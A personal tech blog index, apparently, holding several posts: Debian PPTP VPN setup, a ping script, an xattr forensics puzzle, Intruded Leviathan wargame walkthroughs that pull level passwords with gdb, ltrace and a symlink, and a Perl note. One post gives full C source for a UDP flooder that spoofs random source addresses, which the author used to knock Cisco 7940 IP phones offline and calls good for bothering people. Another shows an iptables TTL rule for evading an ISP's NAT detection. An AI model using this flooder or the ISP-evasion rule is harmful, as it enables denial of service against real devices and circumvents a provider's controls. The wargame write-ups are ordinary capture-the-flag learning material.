Linux

PPTP VPN With Debian (add button disabled)

0
164 jours
by in Linux, Networking, OS

Today I had to create a PPTP VPN in a Debian virtual machine, therefore I installed the following packets :

 

  • $sudo apt-get install pptpd
  • $sudo apt-get install pptp
  • $sudo apt-get instapp network-manager-pptp

but when I tried to add the VPN ( in System -> Preferences -> Network Connections ) the « add » button was disabled.

I tried to use the installed tools such as « pptpsetup », but I couldn’t connect remotely to my VPN, but after a few searches on apt with apt-cache search, and with the help of a friend we found out that other packages were missing. To solve the problem you might install the following package :

 

  • $sudo apt-get network-manager-pptp-gnome ( which was the Gnome GUI)

 

If this doesn’t solve the problem yet, ( and to install everything ), I finally installed also those :

 

  • $sudo apt-get install network-manager-openvpn
  • $sudo apt-get install network-manager-vpnc
  • $sudo apt-get install network-manager-vpnc-gnome

 

after this I restarted the following services :

  • /etc/init.d/pptpd restart
  • /etc/init.d/network-manager restart

and I could configure my VPN.

 

and that’s it.

 

 

NAT is blocked

0
412 jours
by in Linux, mac, Networking, OS

Today, I got a new laptop at home, and I wanted to connect it to the internet, but my ISP required me to
give the mac address of each device I wanted to connect to the internet, so for 10£, I could register on internet
4 mac addresses !

Unfortunately for me, I have really more than 10 devices to connect.
That’s why I decided to buy a Cisco Linksys E2000 router to use the NAT (Network address translation).
Once my router seted up and connected, I discovered with horror that I couldn’t go on the internet, and always
received a message like the following: « NAT was detected … bla bla bla Illegal … bla bla bla ».

As you may imagine, a basic connection is like the following :

Network

but in my case, it could be designed like the following :

ISP

and I wanted to add a router, implementing NAT to avoid me to buy « mac addresses ».


After a few readings ( RFC of NAT) and a few tests with Wireshark, I discovered that the only field which was modified by the router was the TTL (Time To Live) field .

That’s how I came with the idea to upgrade the TTL from 2 on my machines, and I fastly discovered that with only one IpTables command I could do that :

iptables -t mangle -I postrouting -j TTL --ttl-set inc 2

and this is how I bypassed the TTL check of my ISP.

Have fun ;)

Next step: Linux Router to increment the ttl by 1 on the router !

Ping Script

0
568 jours
by in Linux, mac, OS, Programmation

A few minutes ago I completed this little ping script,
for non initiated users.

It first pings the 192.168.1.1
then pings the 192.168.2.1
after that it pings the 8.8.8.8
and finally pings the www.google.com address

Why does it pings 1.1 and 2.1 ?

Because my friend wanted to use it in different areas, ( he his not familiar with the shell ) for example at work 1.1 and home 2.1.

Why does it pings 8.8.8.8 and google.com ?

Similar as above  8.8.8.8 is the DNS of google .. and  google.com is just reaching the web

How does it work ? :

Execute the script.sh and it will print out  5 pings to 1.1  and write the result in GREEN / RED and then 5 pings to 2.1 and the result in GREEN / RED
and so one.

The script : 

#!/bin/sh
GREEN="\\033[1;32m"
NORMAL="\\033[0;39m"
RED="\\033[1;31m"
clear
####################### 1.1 ################
ping -c 5 192.168.1.1
if [ ! "$?" -eq 0 ]; then
echo -e "$RED" "ping 1.1 failed" "$NORMAL"
else
echo -e "$GREEN"  "ping 1.1 passed" "$NORMAL"
fi
########################## 2.1 ##############
ping -c 5 192.168.2.1
if [ ! "$?" -eq 0 ]; then
echo -e "$RED"  "ping 2.1 failed" "$NORMAL"
else
echo -e "$GREEN" "ping 2.1 passed" "$NORMAL"
fi
########################## 8.8 ##############
ping -c 5 8.8.8.8
if [ ! "$?" -eq 0 ]; then
echo-e "$RED" "ping 8.8 failed" "$NORMAL"
else
echo -e "$GREEN" "ping 8.8 passed" "$NORMAL"
fi
########################## GOOGLE ##############
ping -c 5 www.google.com
if [ ! "$?" -eq 0 ]; then
echo -e "$RED" "ping google failed" "$NORMAL"
else
echo -e "$GREEN" "ping google passed" "$NORMAL"
fi

So have fun ;)

Hidden password in an extended attribute

2
568 jours
by in Linux, mac, OS, Security

Today I was playing with some forensic challenges and I got surprised by
one of them. It was going like this : « A password is hidden … but where »

The file was an image, and my first idea was to try some steganography tools,
but after one little hour, some researches … I began to be very bored, and
asked my friend Google about hidden data on OS X.

After a few minutes I found the answer xattr
the EXTENDED ATTRIBUTES … they are kind of similar to the alternate
data stream in Windows.

It’s why I decided to explain you how it was working :

  • Open a shell and enter into Python
>>> xattr.listxattr("test.png")
(u'com.apple.metadata:kMDItemWhereFroms', u'user.comment')
>>>

as you may see … there are some attributes, and one of them is « user.comment », after
some researches on the internet ( 1 min ) I discovered how to print it out :

>>> xattr.getxattr("test.png", "user.comment")
'Password: XnHjst6&'
>>>

And the challenge was finished ! It was the first time I saw the extended attributes … and I found it very interesting.

have fun

Intruded Nº4

0
618 jours
by in Linux, OS, Security

For the 4th one, we remeber that there was a program called
« level4″ in the /wargame folder, let’s go to it.

first run :

level4@leviathan:/wargame$ ./level4
Enter the password> lol
bzzzzzzzzap. WRONG
level4@leviathan:/wargame$

interesting .. it looks like the 2 challenge, let’s disassemble the main part : 

(gdb) disassemble main
Dump of assembler code for function main:
0x08048523 :	lea    0x4(%esp),%ecx
0x08048527 :	and    $0xfffffff0,%esp
0x0804852a :	pushl  0xfffffffc(%ecx)
0x0804852d :	push   %ebp
0x0804852e :	mov    %esp,%ebp
0x08048530 :	push   %ecx
0x08048531 :	sub    $0x44,%esp
0x08048534 :	mov    0x8048757,%eax
0x08048539 :	mov    %eax,0xfffffff1(%ebp)
0x0804853c :	movzwl 0x804875b,%eax
0x08048543 :	mov    %ax,0xfffffff5(%ebp)
0x08048547 :	movzbl 0x804875d,%eax
0x0804854e :	mov    %al,0xfffffff7(%ebp)
0x08048551 :	mov    0x804875e,%eax
0x08048556 :	mov    %eax,0xffffffe7(%ebp)
0x08048559 :	mov    0x8048762,%eax
0x0804855e :	mov    %eax,0xffffffeb(%ebp)
0x08048561 :	movzwl 0x8048766,%eax
0x08048568 :	mov    %ax,0xffffffef(%ebp)
0x0804856c :	mov    0x8048768,%eax
0x08048571 :	mov    %eax,0xffffffe0(%ebp)
0x08048574 :	movzwl 0x804876c,%eax
0x0804857b :	mov    %ax,0xffffffe4(%ebp)
0x0804857f :	movzbl 0x804876e,%eax
0x08048586 :	mov    %al,0xffffffe6(%ebp)
0x08048589 :	mov    0x804876f,%eax
0x0804858e :	mov    %eax,0xffffffd9(%ebp)
0x08048591 :	movzwl 0x8048773,%eax
0x08048598 :	mov    %ax,0xffffffdd(%ebp)
0x0804859c :	movzbl 0x8048775,%eax
0x080485a3 :	mov    %al,0xffffffdf(%ebp)
0x080485a6 :	mov    0x8048776,%eax
0x080485ab :	mov    %eax,0xffffffcf(%ebp)
0x080485ae :	mov    0x804877a,%eax
0x080485b3 :	mov    %eax,0xffffffd3(%ebp)
0x080485b6 :	movzwl 0x804877e,%eax
0x080485bd :	mov    %ax,0xffffffd7(%ebp)
0x080485c1 :	lea    0xffffffd9(%ebp),%eax
0x080485c4 :	mov    %eax,0x4(%esp)
0x080485c8 :	lea    0xffffffe0(%ebp),%eax
0x080485cb :	mov    %eax,(%esp)
0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de 
0x080485d7 :	movl   $0x1,0xfffffff8(%ebp)
0x080485de :	movl   $0x8048742,(%esp)
0x080485e5 :	call   0x80483bc

0x080485ea :	call   0x8048484 
0x080485ef :	add    $0x44,%esp
0x080485f2 :	pop    %ecx
0x080485f3 :	pop    %ebp
0x080485f4 :	lea    0xfffffffc(%ecx),%esp
0x080485f7 :	ret
---Type  to continue, or q  to quit---q
Quit

Again, we can take the interesting part :

0x080485ce :	call   0x804835c 
0x080485d3 :	test   %eax,%eax
0x080485d5 :	jne    0x80485de

let’s make a break point on it, and run it until it ask the password : 

reakpoint 1 at 0x804835c
(gdb) r
Starting program: /wargame/level4 

Breakpoint 1, 0x0804835c in strcmp@plt ()
(gdb) s
Single stepping until exit from function strcmp@plt,
which has no line number information.
0xb7f1eec0 in strcmp () from /lib/tls/i686/cmov/libc.so.6
(gdb) s
Single stepping until exit from function strcmp,
which has no line number information.
0x080485d3 in main ()
(gdb) s
Single stepping until exit from function main,
which has no line number information.
Enter the password> test

/!\ there is an interesting thing, I had to push 3 times « s » to arrive to my break point
( I should analyse this, anyway let’s continue ) /!\

let’s see what’s happening when we analyse $esp 

(gdb) x/2x $esp
0xbffff8bc:	0x080484e6	0xbffff8dd
(gdb) x/s 0xbffff8dd
0xbffff8dd:	 "test\n"

Ok, we got our password back, so, let’s go a bit further

(gdb) x/3x $esp
0xbffff8bc: 0x080484e6 0xbffff8dd 0xbffff9dd
(gdb) x/s 0xbffff9dd
0xbffff9dd: « snlprintf\n »
(gdb)

ok .. here there is a little trick "snlprintf" is the password we are searching for,
they just put a " C " name as string. the clue is "\n" at the end of snlprintf ;)

let's try the password :

level4@leviathan:/wargame$ ./level4
Enter the password> snlprintf
[You've got shell]!
sh-3.1$

yeah let's go to the next lvl ;)

Intruded Nº3

0
619 jours
by in Linux, OS, Security

Hi,

ready for the challenge number 3 ?

let’s connect to it 


ssh level3@leviathan.intruded.net -p 10101
*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level3@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686

level3@leviathan:~$

Let’s directly go to the Wargame folder 

level3@leviathan:~$ cd /wargame/
level3@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx

let’s try one by one the programs, to see what’s our.

level3@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx
level3@leviathan:/wargame$ ./level4
-bash: ./level4: Permission denied
level3@leviathan:/wargame$ ./printfile
-bash: ./printfile: Permission denied
level3@leviathan:/wargame$ ./sphinx
-bash: ./sphinx: Permission denied
level3@leviathan:/wargame$ ./prog
Cannot find /tmp/file.log
level3@leviathan:/wargame$

It looks like we have to use ./prog

we have to read /home/level4/.passwd …
and ./prog is reading the file /tmp/file.log and printing the content … so let’s link both 

level3@leviathan:/wargame$ ln -s /home/level4/.passwd /tmp/file.log
level3@leviathan:/wargame$ ./prog
R0gBtSP5
level3@leviathan:/wargame$

Yeah … got it !!

ok, next challenges tomorrow :)

Intruded nº2

0
619 jours
by in Linux, OS, Security

Now that we succeeded the first level, let’s go for the second one.

Once connected to the second level you get this :

ssh level2@leviathan.intruded.net -p 10101
*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level2@leviathan.intruded.net's password:
Permission denied, please try again.
level2@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686
level2@leviathan:~$

let’s see what files are available :

level2@leviathan:~$ ls -a
.  ..  .bash_history  .bash_logout  .bash_profile  .bashrc  .passwd
level2@leviathan:~$

Hmm nothing interesting let’s get one folder above,

level2@leviathan:/home$ ls -a
.  ..  level1  level2  level3  level4  level5  level6  level7  level8
level2@leviathan:/home$ cd level3/
-bash: cd: level3/: Permission denied
level2@leviathan:/home$

Hmm we cannot go to the level3 … let’s get to one folder above again

level2@leviathan:/$ ls -a
.    boot   etc     initrd.img  media  proc  srv  usr      wargame
..   cdrom  home    lib         mnt    root  sys  var
bin  dev    initrd  lost+found  opt    sbin  tmp  vmlinuz
level2@leviathan:/$

Haaa , there is a wargame folder, let’s try this one

level2@leviathan:/wargame$ ls
check  level4  printfile  prog  sphinx
level2@leviathan:/wargame$

ok, let’s try the first program :

level2@leviathan:/wargame$ ./check
password: test
Wrong password, Good Bye ...
level2@leviathan:/wargame$

Hmmm it looks like it’s a strcmp in C … if you remember I wrote an article about that,
how to get a password with GDB ( here )

let’s try it here :

 level2@leviathan:/wargame$ gdb  ./check
GNU gdb 6.4.90-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".

Let’s disassemble the main function :

(gdb) disassemble main
Dump of assembler code for function main:
0x08048464 :	lea    0x4(%esp),%ecx
0x08048468 :	and    $0xfffffff0,%esp
0x0804846b :	pushl  0xfffffffc(%ecx)
0x0804846e :	push   %ebp
0x0804846f :	mov    %esp,%ebp
0x08048471 :	push   %ecx
0x08048472 :	sub    $0x34,%esp
0x08048475 :	mov    0x8048668,%eax
0x0804847a :	mov    %eax,0xfffffff3(%ebp)
0x0804847d :	mov    0x804866c,%eax
0x08048482 :	mov    %eax,0xffffffec(%ebp)
0x08048485 :	movzwl 0x8048670,%eax
0x0804848c :	mov    %ax,0xfffffff0(%ebp)
0x08048490 :	movzbl 0x8048672,%eax
0x08048497 :	mov    %al,0xfffffff2(%ebp)
0x0804849a :	mov    0x8048673,%eax
0x0804849f :	mov    %eax,0xffffffe8(%ebp)
0x080484a2 :	mov    0x8048677,%eax
0x080484a7 :	mov    %eax,0xffffffe3(%ebp)
0x080484aa :	movzbl 0x804867b,%eax
0x080484b1 :	mov    %al,0xffffffe7(%ebp)
0x080484b4 :	movl   $0x8048638,(%esp)
0x080484bb :	call   0x8048398

0x080484c0 :	call   0x8048338
0x080484c5 :	mov    %al,0xfffffff7(%ebp)
0x080484c8 :	call   0x8048338
0x080484cd :	mov    %al,0xfffffff8(%ebp)
0x080484d0 :	call   0x8048338
0x080484d5 :	mov    %al,0xfffffff9(%ebp)
0x080484d8 :	movb   $0x0,0xfffffffa(%ebp)
0x080484dc :	lea    0xfffffff3(%ebp),%eax
0x080484df :	mov    %eax,0x4(%esp)
0x080484e3 :	lea    0xfffffff7(%ebp),%eax
0x080484e6 :	mov    %eax,(%esp)
0x080484e9 :	call   0x8048348
0x080484ee :	test   %eax,%eax
0x080484f0 :	jne    0x804850c
0x080484f2 :	movl   $0x3ea,(%esp)
0x080484f9 :	call   0x8048358
0x080484fe :	movl   $0x8048643,(%esp)
0x08048505 :	call   0x8048368
0x0804850a :	jmp    0x8048518
0x0804850c :	movl   $0x804864b,(%esp)
0x08048513 :	call   0x8048378

0x08048518 :	add    $0x34,%esp
0x0804851b :	pop    %ecx
0x0804851c :	pop    %ebp
0x0804851d :	lea    0xfffffffc(%ecx),%esp
0x08048520 :	ret
0x08048521 :	nop
0x08048522 :	nop
0x08048523 :	nop
0x08048524 :	nop
0x08048525 :	nop
0x08048526 :	nop
0x08048527 :	nop
0x08048528 :	nop
0x08048529 :	nop
0x0804852a :	nop
0x0804852b :	nop
0x0804852c :	nop
0x0804852d :	nop
0x0804852e :	nop
0x0804852f :	nop
End of assembler dump.

as we can see :

0x080484e9 :	call   0x8048348
0x080484ee :	test   %eax,%eax
0x080484f0 :	jne    0x804850c

this is the interesting part, let’s make a break point on the call and analyse it with x/x

(gdb) b * 0x8048348
Breakpoint 1 at 0x8048348
(gdb) r
Starting program: /wargame/check
password: test

Breakpoint 1, 0x08048348 in strcmp@plt ()
(gdb) x/x $esp
0xbffff9fc:	0x080484ee

as we can see it’s giving us, what is on this moment in the stack, let’s go further,
we are gonna print the stack with x/s and see what happens.

(gdb) x/s 0x080484ee
0x80484ee :	 "\205?u\032?\004$?\003"

it looks not normal let’s try a bit more

(gdb) x/2x $esp
0xbffff9fc:	0x080484ee	0xbffffa2f
(gdb) x/s 0xbffffa2f
0xbffffa2f:	 "tes"

Haaa this is OUR « tes » we can already conclude that the password is only 3 chars, let’s get more inside it
again

(gdb) x/3x $esp
0xbffff9fc:	0x080484ee	0xbffffa2f	0xbffffa2b
(gdb) x/s 0xbffffa2b
0xbffffa2b:	 "sex"
(gdb)

Got it …

let’s run again, tadaaa new shell

level2@leviathan:/wargame$ ./check
password: sex
sh-3.1$

anyway another solution could have been to use the ltrace command:

level2@leviathan:/wargame$ ltrace ./check
__libc_start_main(0x8048464, 1, 0xbffffad4, 0x8048580, 0x8048530
printf("password: ")                                                                                                         = 10
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4password: test
)                                                            = 116
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4)                                                            = 101
getchar(0x8048638, 0xb7fe0ff4, 0xbffffa28, 0x80483f0, 0xb7fe0ff4)                                                            = 115
strcmp("tes", "sex")                                                                                                         = 1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                                                                         = 29
+++ exited (status 29) +++
level2@leviathan:/wargame$

let’s go to the next level ;) 

sh-3.1$ cat /home/level3/.passwd
oc7vaCOg
sh-3.1$

Intruded nº1

0
619 jours
by in Linux, OS, Security

Today I tried the Intruded Leviathan wargame ( the first levels ),

I will explain how to resolve them easily.

Let’s try the first one.

  1. open a terminal
  2. type « ssh level1@leviathan.intruded.net -p 10101″
  3. type the password  leviathan

and then you should get something like this :

*************************************************
*    Welcome to Intruded.net Wargame Server     *
*                                               *
*       * You are playing "Leviathan"           *
*       * Most levels can be found in /wargame  *
*       * Login: level1:leviathan               *
*       * Support: irc.intruded.net #wargames   *
*                                               *
*                                               *
*       ! Server is restarted every 12 hours    *
*       ! Server is cleaned every reboot        *
*       ! /tmp direcotry is writable            *
*                                               *
*                                               *
*************************************************
level1@leviathan.intruded.net's password:
Linux leviathan 2.6.18-6-686 #1 SMP Thu Aug 20 21:56:59 UTC 2009 i686

Now that we are connected, we should try the first command to see

ls -a = to list the folders even the hidden one

level1@leviathan:~$ ls -a
.  ..  .backup  .bash_history  .bash_logout  .bash_profile  .bashrc  .passwd

Hmmm there is a « backup » folder hidden, let’s enter in it, and list it.

level1@leviathan:~$ cd ./.backup
level1@leviathan:~/.backup$ ls -a
bookmarks.html

Ok, bookmarks let’s see if there are some « passwords »

level1@leviathan:~/.backup$ cat ./bookmarks.html |grep pass
<DT><A HREF="http://nahtaivel.intruded.net/passwordus.html" TEMP: "AFeSdWEf"ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to level2</A>
level1@leviathan:~/.backup$

Easy … we got it

let’s meet at the next level :)

Perl reference and hashtable

0
696 jours
by in Linux, mac, OS, Programmation, Windows

Today i was making some Perl and I was searching how to create something like in C with a pointer on table who contains an hash table and I was searching for years reading crap. But I finally found the solution and would like to show it to you in this brief post.


my $siteWeb = [
        ['Site1' =>
                {'address' => 'address',
                 'add'     => 'add'}],
        ['Site2' =>
                {'address' => 'address',
                 'add'     => 'add'}],
        ['Site3' =>
                {'address' => 'address',
                 'add'     => 'add'}]
        ];

Here above we can see that I define a reference to a table 


my $siteWeb = [
...

inside it I define another table 


my $siteWeb = [
        ['Site1' =>
...

and we can see that inside the second table my cell[0] is a hashtable
that contains 


my $siteWeb = [
        ['Site1' =>
                {'address' => 'address',
                 'add'     => 'add'}],

and to access it I can use this 


my $Sw = @{$siteWeb};

for( $i=0; $i<=$Sw; $i++){
        print "$siteWeb->[$i][0]\n";

}

To know how much cells there is in the reference array I use this syntax


my $Sw = @{$siteWeb};

this stores the "number" of cells there is in the @ array of {reference};
anyway this was fun... because I'm learning perl and I really like
I hope this will maybe help you one day ;)

UDP Flooder in C

0
737 jours
by in Linux, Networking, OS, Security

Yesterday we where still working on some attacks on our  bench test  and we tried some exploit on the phones
that we found on the internet. Most of them where making some DDOS on the phone but they also blocked them
this means that when people will try to phone … they will discover the phone freezing … then i made up with my
friend some modifications on some code that I had from a few years ago in C a UDP flooder.

This is sending UDP on random ports to a specific address with a random source  … and only working on linux.
the code help us to stop the connection between the 2 phones.
The one is trying to reach the other one … but the other one is too busy to answer all the « pings » and send them
to random addresses that he cannot answer.

We also discovered that when the connection between the 2 phones is established the phone
is not affected.

here his the code.

#include <stdio.h> // printf/fprintf
#include <stdlib.h>
#include <string.h> 

#include <netinet/ip.h> // struct ip
#include <sys/socket.h> // socket()
#include <netinet/in.h> // struct sockadd

#define __FAVOR_BSD
#define _USE_BSD
#include <netinet/udp.h> // struct udp

#define PADDING_SIZE 1
#define N_LOOP 10
#define U_WAITING 100000 

void udp(char *);
unsigned short int in_chksum (unsigned short int *, int);
unsigned long hasard(unsigned long, unsigned long);

main() {
srand(time(NULL));
int i;

for(i=0;i<N_LOOP;i++)
 {
 udp("xxx.xxx.xxx.xxx");
 usleep(U_WAITING);
 printf("-");    
 udp("xxx.xxx.xxx.xxx");
 usleep(U_WAITING);
 printf("+");
 }
}

void udp(char *cible) {

int sd;
sd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sd == -1) {
fprintf(stderr,"socket() error, root ?\n");
}

unsigned long ip_src = hasard(4294967295/2,4294967295);
unsigned long ip_dst = inet_addr(cible);
unsigned short p_src = (unsigned short) hasard(0,65535);
unsigned short p_dst = (unsigned short) hasard(0,65535);

struct sockaddr_in sin;

sin.sin_family = AF_INET;
sin.sin_port = p_dst;
sin.sin_addr.s_addr = ip_dst; // dst

struct ip *ip;
struct udphdr *udp;
char *dgm, *data;

int pksize = sizeof(struct ip) + sizeof(struct udphdr) + PADDING_SIZE;
dgm = (char *) malloc(pksize);
ip = (struct ip *) dgm;
udp = (struct udphdr *) (dgm + sizeof(struct ip));
data = (char *) (dgm + sizeof(struct ip) + sizeof(struct udphdr));

memset(dgm, 0, pksize);
memcpy((char *) data, "G", PADDING_SIZE);

int un = 1;
if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, (char *)&un, sizeof(un)) == -1)
 {
 fprintf(stderr,"setsockopt()");
 exit(-1);
 }

//entete ip

ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = sizeof(pksize);
ip->ip_ttl = 255;
ip->ip_off = 0;
ip->ip_id = sizeof( 45 );
ip->ip_p = IPPROTO_UDP;
ip->ip_sum = 0; // a remplir aprés
ip->ip_src.s_addr = ip_src;
ip->ip_dst.s_addr = ip_dst;

//entete udp

udp->uh_sport = p_src;
udp->uh_dport = p_dst;
udp->uh_ulen = htons(sizeof(struct udphdr ) + PADDING_SIZE);
udp->uh_sum = 0;

// envoi
if (sendto(sd, dgm, pksize, 0, (struct sockaddr *) &sin,
 sizeof(struct sockaddr)) == -1) {
 fprintf(stderr,"oops, sendto() error\n");
 }

//libere la memoire
free(dgm);
close(sd);
}

u_short in_chksum (u_short *addr, int len) // taken from papasmurf.c
{
 register int nleft = len;
 register u_short *w = addr;
 register int sum = 0;
 u_short answer = 0;

 while (nleft > 1)
 {
 sum += *w++;
 nleft -= 2;
 }

 if (nleft == 1)
 {
 *(u_char *)(&answer) = *(u_char *)w;
 sum += answer;
 }

 sum = (sum >> 16) + (sum + 0xffff);
 sum += (sum >> 16);
 answer = ~sum;
 return(answer);
}

unsigned long hasard(unsigned long min, unsigned long max){
return (u_long) (min + ((float) rand() / RAND_MAX * (max - min + 1)));
}

this is quiet good working to border people without affecting the phone.
you can easily compile it with the following command :

gcc -o udp udp.c

and run it with

./udp

if everything is working you should see

+-+-+-

this is appearing during the running time.

we tested it on 7940 phones from cisco and it was good working … soon we will publish some new code.

Have fun.

Next »
Get Adobe Flash playerPlugin by wpburn.com wordpress themes
Go to Top